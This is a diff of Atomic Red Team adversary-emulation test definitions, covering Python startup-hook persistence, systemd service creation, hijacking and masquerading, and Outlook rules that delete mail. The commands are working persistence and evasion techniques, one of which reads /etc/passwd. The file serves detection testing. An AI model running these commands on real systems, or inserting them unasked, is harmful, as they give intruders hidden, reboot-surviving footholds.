command: |
$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
Get-ChildItem -Path "$UserDir"
& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
-ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
}; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
(-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
| Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
|\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
\nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
-Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
-Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
- name: Python Startup Hook - atomic_hook.pth (Linux)
auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
description: "Executes code by creating atomic_hook.pth in the site-packages
directory. \nThis script runs automatically for every user on the system when
Python starts.\n"
supported_platforms:
- linux
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
'
executor:
name: sh
elevation_required: false
command: |
TEMPDIR="/tmp/atomic_sitecust_posix"
mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
cleanup_command: |
if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
rm -rf /tmp/atomic_sitecust_posix
echo "[+] Successful Removed atomic_hook.pth"
rm -rf /tmp/atomic_hook_poc.txt
echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
- name: Python Startup Hook - atomic_hook.pth (macOS)
auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
description: 'Creates a Python startup hook using a .pth file inside a virtual
environment on macOS.
'
supported_platforms:
- macos
input_arguments:
exe_name:
description: App to launch
type: string
default: Calculator
python_exe:
description: The python binary name to test
type: string
default: python3
dependency_executor_name: sh
dependencies:
- description: Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
prereq_command: |
PYTHON_CMD=$(command -v python || command -v #{python_exe})
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
(''brew install python'' or ''brew install python3 or brew install python@3.X'')
or the macOS developer tools (''xcode-select --install'')."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
pkill "#{exe_name}" || true
[ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
@@ -52597,7 +52203,7 @@ execution:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:58:28.694Z'
name: 'System Services: Systemctl'
name: Systemctl
description: "Adversaries may abuse systemctl to execute commands or programs.
Systemctl is the primary interface for systemd, the Linux init system and
service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -52620,586 +52226,7 @@ execution:
- Linux
x_mitre_version: '1.0'
x_mitre_remote_support: false
identifier: T1569.003
atomic_tests:
- name: Create and Enable a Malicious systemd Service Unit
auto_generated_guid: e58c8723-5503-4533-b642-535cd20ec648
description: |
Creates a new systemd service unit file in /etc/systemd/system/ and enables it using
systemctl enable followed by systemctl start. Adversaries commonly abuse this workflow
to establish persistence or execute arbitrary commands under the context of systemd.
This simulates the full attacker workflow: writing the unit file, reloading the systemd
daemon, enabling the service to survive reboots, and starting it immediately. This is
consistent with techniques observed in ransomware precursor activity and post-exploitation
frameworks targeting Linux infrastructure.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the malicious service to create
type: string
default: atomic-test
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "echo atomictest > /tmp/atomic_service_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable.
Ensure systemd is installed."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Test Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_service_output.txt
- name: Create systemd Service Unit from /tmp (Unusual Location)
auto_generated_guid: a1fa406e-2354-4a24-b6d6-94157e7564d4
description: |
Creates a systemd service unit file in /tmp and loads it using systemctl start with
an absolute path. Adversaries may write service unit files to world-writable directories
such as /tmp to avoid triggering alerts on new file creation in standard service
directories, or to execute payloads transiently without permanently installing a service.
Loading a service unit from an arbitrary path rather than a standard systemd directory
is unusual behaviour that should be detectable by monitoring systemctl command arguments.
supported_platforms:
- linux
input_arguments:
service_path:
description: Full path to the service file to be written in /tmp
type: path
default: "/tmp/atomic_tmp.service"
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "id > /tmp/atomic_tmp_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: "/tmp must exist and be writable\n"
prereq_command: 'if [ -d "/tmp" ] && [ -w "/tmp" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "/tmp does not exist or is not writable on this
system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > #{service_path}
echo "Description=Atomic Tmp Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
cleanup_command: |
systemctl stop $(basename #{service_path}) 2>/dev/null || true
rm -f #{service_path}
rm -f /tmp/atomic_tmp_output.txt
- name: Create systemd Service Unit from /dev/shm (Unusual Location)
auto_generated_guid: dce49381-a26b-4d95-bdfa-c607ffe8bee5
description: |
Creates a systemd service unit file in /dev/shm and loads it using systemctl.
/dev/shm is a memory-backed filesystem that is world-writable on most Linux systems
and does not persist across reboots, making it particularly attractive to adversaries
seeking to execute transient payloads while evading file-based forensic detection.
This technique has been observed in post-exploitation scenarios where attackers
deliberately avoid writing to disk-backed locations to limit forensic artefacts.
supported_platforms:
- linux
input_arguments:
service_path:
description: Full path to the service file to be written in /dev/shm
type: path
default: "/dev/shm/atomic_shm.service"
command_to_run:
description: Command the service will execute
type: string
default: /bin/bash -c "whoami > /tmp/atomic_shm_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: "/dev/shm must exist and be writable\n"
prereq_command: 'if [ -d "/dev/shm" ] && [ -w "/dev/shm" ]; then exit 0; else
exit 1; fi
'
get_prereq_command: 'echo "/dev/shm does not exist or is not writable on this
system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > #{service_path}
echo "Description=Atomic SHM Service" >> #{service_path}
echo "" >> #{service_path}
echo "[Service]" >> #{service_path}
echo "ExecStart=#{command_to_run}" >> #{service_path}
echo "" >> #{service_path}
echo "[Install]" >> #{service_path}
echo "WantedBy=multi-user.target" >> #{service_path}
systemctl link #{service_path}
systemctl start $(basename #{service_path})
systemctl status $(basename #{service_path})
cleanup_command: |
systemctl stop $(basename #{service_path}) 2>/dev/null || true
rm -f #{service_path}
rm -f /tmp/atomic_shm_output.txt
- name: Modify Existing systemd Service to Execute Malicious Command
auto_generated_guid: 6123928f-6389-4914-8d25-a5d69bd657fa
description: |
Creates a service unit file that initially runs a benign command, then modifies the
ExecStart directive using sed to substitute a malicious command before reloading and
restarting the service. Adversaries may hijack existing services to blend in with normal
service activity and avoid triggering detections focused solely on new service creation.
This technique reflects the tradecraft observed in more sophisticated intrusions where
blending into existing process trees is a priority over creating net-new services.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the service to create and then modify for the test
type: string
default: atomic-modify-test
malicious_command:
description: Malicious command to substitute into ExecStart
type: string
default: /bin/bash -c "echo hijacked > /tmp/atomic_hijack_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'sed must be available on the system
'
prereq_command: 'if [ -x "$(command -v sed)" ]; then exit 0; else exit 1;
fi
'
get_prereq_command: 'apt-get install -y sed 2>/dev/null || yum install -y
sed 2>/dev/null || echo "Could not install sed automatically."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Legitimate Looking Service" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=/bin/true" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
sed -i 's|ExecStart=.*|ExecStart=#{malicious_command}|' /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_hijack_output.txt
- name: Execute Command via Transient systemd Service (systemd-run)
auto_generated_guid: a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236
description: |
Uses systemd-run to execute a command as a transient systemd service without creating
a persistent unit file on disk. Adversaries may use systemd-run to execute arbitrary
commands under the context of systemd while bypassing controls that monitor for new
unit file creation, since transient services exist only in memory for their lifetime.
This is a particularly stealthy technique as it leaves minimal on-disk artefacts and
the service disappears from systemctl list-units once execution completes.
supported_platforms:
- linux
input_arguments:
unit_name:
description: Name of the transient systemd unit to create
type: string
default: atomic-transient
command_to_run:
description: Command to execute as a transient service
type: string
default: /bin/bash -c "id > /tmp/atomic_transient_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemd-run must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi
'
get_prereq_command: 'echo "systemd-run is not available. Ensure systemd is
installed and up to date."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
executor:
name: sh
elevation_required: true
command: |
systemd-run --unit=#{unit_name} --wait #{command_to_run}
systemctl status #{unit_name}.service 2>/dev/null || echo "Transient service has already completed and exited."
cleanup_command: |
systemctl stop #{unit_name}.service 2>/dev/null || true
rm -f /tmp/atomic_transient_output.txt
- name: Enumerate All systemd Services Using systemctl
auto_generated_guid: 1e5be8d4-605a-4acb-8709-2f80b2d8ea95
description: |
Enumerates all systemd services and their current states using systemctl list-units
and systemctl list-unit-files. Adversaries may enumerate running and enabled services
to identify targets for hijacking, understand the host environment, map installed
security tooling, or identify gaps in monitoring coverage.
Service enumeration is a common reconnaissance step during post-exploitation and may
precede service hijacking or masquerading activity. This test does not require
elevation as service listing is available to unprivileged users on most Linux systems.
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
executor:
name: sh
elevation_required: false
command: |
systemctl list-units --type=service --all
systemctl list-unit-files --type=service
cleanup_command: 'echo "No cleanup required"
'
- name: Enable systemd Service for Persistence with Auto-Restart
auto_generated_guid: 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7
description: |
Creates a payload script and a systemd service unit that executes it, then enables
the service to survive reboots using systemctl enable. The service is configured with
Restart=always to automatically restart on failure, mimicking the persistence mechanism
used by adversaries deploying backdoors or beacons on Linux hosts.
This technique is consistent with observed post-exploitation tradecraft where adversaries
establish a foothold that survives reboots and self-heals after interruption, complicating
incident response and remediation efforts.
supported_platforms:
- linux
input_arguments:
service_name:
description: Name of the persistence service to create
type: string
default: atomic-persist
payload_path:
description: Path to the payload script that the service will execute
type: path
default: "/tmp/atomic_payload.sh"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
- description: 'Payload script must exist at the specified path
'
prereq_command: 'if [ -f "#{payload_path}" ]; then exit 0; else exit 1; fi
'
get_prereq_command: |
echo '#!/bin/bash' > #{payload_path}
echo 'echo persistent >> /tmp/atomic_persist_output.txt' >> #{payload_path}
chmod +x #{payload_path}
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{service_name}.service
echo "Description=Atomic Persistence Service" >> /etc/systemd/system/#{service_name}.service
echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Service]" >> /etc/systemd/system/#{service_name}.service
echo "ExecStart=#{payload_path}" >> /etc/systemd/system/#{service_name}.service
echo "Restart=always" >> /etc/systemd/system/#{service_name}.service
echo "RestartSec=10" >> /etc/systemd/system/#{service_name}.service
echo "" >> /etc/systemd/system/#{service_name}.service
echo "[Install]" >> /etc/systemd/system/#{service_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
systemctl daemon-reload
systemctl enable #{service_name}.service
systemctl start #{service_name}.service
systemctl status #{service_name}.service
cleanup_command: |
systemctl stop #{service_name}.service 2>/dev/null || true
systemctl disable #{service_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{service_name}.service
rm -f /etc/systemd/system/multi-user.target.wants/#{service_name}.service
systemctl daemon-reload
rm -f #{payload_path}
rm -f /tmp/atomic_persist_output.txt
- name: Masquerade Malicious Service as Legitimate System Service
auto_generated_guid: 6fec8560-ff64-4bbf-bc79-734fea48f7ca
description: |
Creates a systemd service with a name and description closely resembling a legitimate
system service to blend in with normal service activity. Adversaries may deliberately
choose service names similar to well-known system services such as systemd-networkd,
cron, or ssh to evade detection from analysts reviewing service lists or automated
alerting on service names.
This masquerading technique is particularly effective in environments where detection
relies on service name allowlists or manual review of systemctl list-units output
rather than behavioural analysis of service unit file contents and ExecStart paths.
supported_platforms:
- linux
input_arguments:
masquerade_name:
description: Service name designed to closely mimic a legitimate system
service
type: string
default: systemd-network-helper
command_to_run:
description: Command the masquerading service will execute
type: string
default: /bin/bash -c "echo masquerade > /tmp/atomic_masquerade_output.txt"
dependency_executor_name: sh
dependencies:
- description: 'systemctl must be available on the system
'
prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
1; fi
'
get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
on this system."
'
- description: 'The test must be run as root or with sudo privileges
'
prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "This test requires root privileges. Run as root
or use sudo."
'
- description: "/etc/systemd/system/ directory must exist and be writable\n"
prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
]; then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
'
- description: 'Chosen masquerade service name must not already exist as a real
service
'
prereq_command: 'if ! systemctl list-unit-files --type=service | grep -q "^#{masquerade_name}.service";
then exit 0; else exit 1; fi
'
get_prereq_command: 'echo "A service named #{masquerade_name} already exists.
Change the masquerade_name input argument to avoid conflicts."
'
executor:
name: sh
elevation_required: true
command: |
echo "[Unit]" > /etc/systemd/system/#{masquerade_name}.service
echo "Description=Network connectivity helper service" >> /etc/systemd/system/#{masquerade_name}.service
echo "After=network.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "Before=network-online.target" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Service]" >> /etc/systemd/system/#{masquerade_name}.service
echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{masquerade_name}.service
echo "Restart=on-failure" >> /etc/systemd/system/#{masquerade_name}.service
echo "RestartSec=5" >> /etc/systemd/system/#{masquerade_name}.service
echo "" >> /etc/systemd/system/#{masquerade_name}.service
echo "[Install]" >> /etc/systemd/system/#{masquerade_name}.service
echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{masquerade_name}.service
systemctl daemon-reload
systemctl start #{masquerade_name}.service
systemctl status #{masquerade_name}.service
cleanup_command: |
systemctl stop #{masquerade_name}.service 2>/dev/null || true
systemctl disable #{masquerade_name}.service 2>/dev/null || true
rm -f /etc/systemd/system/#{masquerade_name}.service
systemctl daemon-reload
rm -f /tmp/atomic_masquerade_output.txt
atomic_tests: []
T1059.009:
technique:
type: attack-pattern
@@ -61783,6 +60810,20 @@ persistence:
3. Click 'Select'
name: manual
- name: Chrome/Chromium (Chrome Web Store)
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- linux
- windows
- macos
executor:
steps: |
1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
in Chrome
2. Click 'Add to Chrome'
name: manual
- name: Firefox
auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938
description: 'Create a file called test.wma, with the duration of 30 seconds
@@ -61893,7 +60934,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:41.026Z'
name: 'Office Application Startup: Outlook Rules'
name: Outlook Rules
description: |-
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
@@ -61914,410 +60955,7 @@ persistence:
- Windows
- Office Suite
x_mitre_version: '1.2'
identifier: T1137.005
atomic_tests:
- name: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object
auto_generated_guid: ffadc988-b682-4a68-bd7e-4803666be637
description: |
Creates a malicious Outlook rule via the COM object that permanently deletes
emails when an email with a specific subject keyword arrives. Simulates
adversary persistence via Outlook Rules (T1137.005). Uses DeletePermanently
action as it does not require a resolved Exchange folder unlike MoveToFolder.
NOTE: olRuleActionStartApplication cannot be created programmatically per
Microsoft's Rules object model - DeletePermanently is used as the supported
equivalent that generates the same rule-creation artefact.
NOTE: This test MUST be run from a non-elevated (standard user) PowerShell
session. Outlook COM fails with 0x80080005 when invoked as Administrator.
supported_platforms:
- windows
input_arguments:
rule_name:
description: Name for the malicious Outlook rule
type: string
default: AtomicTest_T1137005_SubjectTrigger
trigger_subject:
description: Email subject keyword that triggers the rule
type: string
default: atomic-rt-trigger
dependencies:
- description: Classic Outlook must be installed (required for COM automation)
prereq_command: |
$clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
if ($clsid) { exit 0 } else { exit 1 }
get_prereq_command: |
Write-Host "[-] Classic Outlook is not installed or COM is not registered."
Write-Host " Install Microsoft 365 Apps with Classic Outlook before running this test."
Write-Host " Note: The new Outlook for Windows does NOT support COM automation."
exit 1
executor:
name: powershell
elevation_required: false
command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] This test must be run from a non-elevated PowerShell session."
Write-Host " Outlook COM fails with 0x80080005 when run as Administrator."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$rule = $rules.Create("#{rule_name}", 0)
$cond = $rule.Conditions.Subject
$cond.Enabled = $true
$cond.Text = @("#{trigger_subject}")
$action = $rule.Actions.DeletePermanently
$action.Enabled = $true
$rule.Enabled = $true
$rules.Save()
Write-Host "[+] Rule '#{rule_name}' created. Emails with subject '#{trigger_subject}' will be permanently deleted."
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$rules = $namespace.DefaultStore.GetRules()
$removed = $false
for ($i = $rules.Count; $i -ge 1; $i--) {
if ($rules.Item($i).Name -eq "#{rule_name}") {
$rules.Remove($rules.Item($i).Name)
$removed = $true
}
}
if ($removed) {
$rules.Save()
Write-Host "[+] All instances of rule '#{rule_name}' removed."
} else {
Write-Host "[*] Rule '#{rule_name}' not found - already removed."
}
- name: Outlook Rule - Sender Address Trigger with DeletePermanently Action via
COM Object
auto_generated_guid: bddfd8d4-7687-4971-b611-50a537ab3ab4
description: |
Creates an Outlook rule via COM that permanently deletes emails received
from a specific sender address. Adversaries use sender-based triggers to
make rules appear more legitimate (e.g. disguised as a filter for a
specific colleague). Tests a different rule condition path through the
